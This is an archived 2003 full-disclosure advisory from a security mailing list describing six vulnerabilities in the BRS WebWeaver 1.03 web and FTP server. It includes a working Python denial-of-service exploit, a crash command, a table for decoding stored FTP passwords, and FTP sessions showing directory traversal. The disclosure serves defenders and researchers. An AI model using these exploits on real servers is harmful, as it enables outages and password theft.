BRS WebWeaver: full disclosure

From: euronymous (just-a-userat_private)
Date: Mon Mar 31 2003 - 10:35:42 PST

  • Next message: subj: "TYPSoft FTP Server"

    topic: BRS WebWeaver: full disclosure
    product: BRS WebWeaver 1.03 
    risk: high
    date: 31/03/2k3
    tested platform: Windows 98 Second Edition
    discovered by: euronymous /F0KP 
    advisory urls:
    contact email: euronymousat_private
    1. Dos Device Path vulnerability in FTP Server
    2. Long URL DoS in HTTP Server 
    3. Weak Encryption Sheme
    4. Remote System Information Gathering
    5. Path Disclosure in FTP Server 
    6. Directory Traversal in FTP Server
    1. Dos Device Path vulnerability in FTP Server
    i have found, that FTP server doesnt checks path, typed by user. 
    malicious local user can crash FTP (and HTTP also) server on 
    non-patched Windows98 machine. 
    just type this command in WebWeaver ftp session: 
    cd /aux/aux/
    After this server goes down..
               1) Apply corresponding patch for your windows
               2) Wait for new version of WebWeaver
               3) Remove this crap at all ))
    2. Long URL DoS in HTTP Server 
    If any local/remote user pass to http server url, that contain 
    2499361 charakters, then server was crashed in 2-5 minutes.  
    It will eat all RAM and finally hang up whole system. Need to
    reboot. Exploit as below:
    }------- start of ---------------{
    #! /usr/bin/env python
    # WebWeaver 1.03 Http Server DoS exploit 
    # by euronymous /f0kp []
    # Usage: ./ target
    # Ex.:   ./
    import sys, httplib
    target = sys.argv[1]
    spl = "f"*2499361
    conn = httplib.HTTPConnection(target)
    conn.request("GET", "/"+spl)
    r1 = conn.getresponse()
    print r1.status
    }--------- end of ---------------{
    following is appear in error.log of WebWeaver:
    }-------------------------- start of error.log ------------------------{
    31/Mar/2003:04:28:52    LOG_ALERT       ERROR: Thread Manager TerminateThreads Timed Out
    31/Mar/2003:04:28:52    LOG_ALERT       ERROR: Thread Manager TerminateThreads Timed Out
    31/Mar/2003:04:28:52    LOG_WARNING     Admin Thread NOT Stopped!  NOT ASSIGNED!
    }--------------------------- end of error.log -------------------------{
               1) Wait for new version of WebWeaver
               2) Remove this crap at all ))
    3. Weak Encryption Sheme
    Webweaver `encrypt' ftp-users passwords and all password
    hashes stored in \config\users.ini file under WebWeaver 
    installation directory. Data is stored in following format:
    Passwords arent case-sensivity for WebWeaver. Below you can 
    see encryption table: 
    g i k m o q s u w e       == encrypted
    1 2 3 4 5 6 7 8 9 0       == plain
    з у П й н ч п Ч г е ╩ ©   == encrypted
    q w e r t y u i o p [ ]   == plain
    З л Н С У Х Щ Ы Э { S     == encrypted
    a s d f g h j k l ; '     == plain
    щ х Л с Й б Я ] a c       == encrypted
    z x c v b n m , . /       == plain
    Any local user can to get this file [users.ini] and 
    `decrypt' user passwords.
           1) Wait for WebWeaver vendor implement strong encryption 
              sheme like MD5 and BlowFish.
           2) Remove this crap at all )). 
    4. Remote System Information Gathering
    Any remote user can get many useful information about 
    system, where BRS WebWeaver is installed. If within 
    installation procedure test cgi scripts was installed
    [in default], then it will enough to go to this url:
    }--------------- start of testcgi.exe output ---------------{
    CGI Test Program
    Arguments To Testcgi
    Argument 1 : 
    Environment Variables
    HTTP_CONNECTION      = keep-alive
    HTTP_KEEP_ALIVE      = 300
    HTTP_ACCEPT_CHARSET  = utf-8,*
    HTTP_ACCEPT_ENCODING = gzip,deflate,compress;q=0.9
    HTTP_ACCEPT_LANGUAGE = ru-ru,ru;q=0.5
    HTTP_ACCEPT          = text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,video/x-mng,image/png,image/jpeg,image/gif;q=0.2,*/*;q=0.1
    HTTP_USER_AGENT      = Mozilla/5.0 (Windows; U; Win98; ru-RU; rv:1.3) Gecko/20030309
    HTTP_HOST            = localhost
    SERVER_PORT          = 80
    URL                  = /scripts/testcgi.exe
    LOCAL_ADDR           = 195.***.**.**
    CONTENT_LENGTH       = 0
    SERVER_SOFTWARE      = BRS WebWeaver/1.03
    SERVER_NAME          = ******30
    REMOTE_HOST          =
    REMOTE_ADDR          =
    DOCUMENT_ROOT        = c:\program files\webweaver
    SCRIPT_NAME          = /scripts/testcgi.exe
    WINDIR               = C:\WINDOWS
    CMDLINE              = WIN
    PATH                 = C:\WINDOWS;C:\WINDOWS\COMMAND
    WINBOOTDIR           = C:\WINDOWS
    PROMPT               = $p$g
    TEMP                 = C:\WINDOWS\TEMP
    TMP                  = C:\WINDOWS\TEMP
    Miscellaneous Information
    Working directory: C:/Program Files/WebWeaver/scripts/
    Current date and time: 2003/03/31 5:07:32 
    }--------------- end of testcgi.exe output ---------------{
    Solution: Remove this script from /scripts/ directory.
    5. Path Disclosure in FTP Server
    I wrote about this vulnerability in v1.01 of WebWeaver 
    It was published in Bugtraq mailing list, but in v1.03
    this flaw else doesnt was fixed. 
    }-------------- sample session -----------{
    220 BRS WebWeaver FTP Server ready.
    User (********.***.*****.***:(none)): 123
    331 Password required for 123.
    230 User 123 logged in.
    ftp> pwd
    257 "/" is current directory.
    ftp> mkdir test
    257 '/test': directory created.
    ftp> mkdir test
    550 'c:\ftp\test': can't create directory.
    ftp> rmdir test
    250 '/test': directory removed.
    ftp> rmdir test
    550 'c:\ftp\test': no such directory.
    }-------------- sample session -----------{
    So, if user make attempt to create already existent
    directory or remove unexistent directory, then 
    Ftp server will output full system path.
       	     1) Wait for new version of WebWeaver
                 2) Remove this crap at all ))
    6. Directory Traversal in FTP Server
    I wrote about this vulnerability in v1.01 of WebWeaver 
    It was published in Bugtraq mailing list, but in v1.03
    this flaw else doesnt was fixed. 
    }-------------- sample session -----------{
    220 BRS WebWeaver FTP Server ready.
    User (********.***.*****.***:(none)): 123
    331 Password required for 123.
    230 User 123 logged in.
    ftp> pwd
    257 "/" is current directory.
    ftp> mkdir ../test
    257 '/..\test': directory created.
    ftp> rmdir ../test
    250 '/..\test': directory removed.
    ftp> mkdir ../windows/test
    257 '/..\windows\test': directory created.
    ftp> rmdir ../windows/test
    250 '/..\windows\test': directory removed.
    }-------------- sample session -----------{
    How you can see any user can exploit this traversal
    bug for creating and removing directories outside
    ftp_root. But user cannot use more useful commands 
    like `ls', `dir'.
               1) Wait for new version of WebWeaver
               2) Remove this crap at all ))
    shouts: R00tC0de, DWC, DHG, HUNGOSH,, all russian 
    security guyz!! to kate especially )) 
    f*ck_off: slavomira and other dirty ppl in *.kz $#%&^! k0dsweb 
    f*cking team
    im not a lame,
    not yet a hacker

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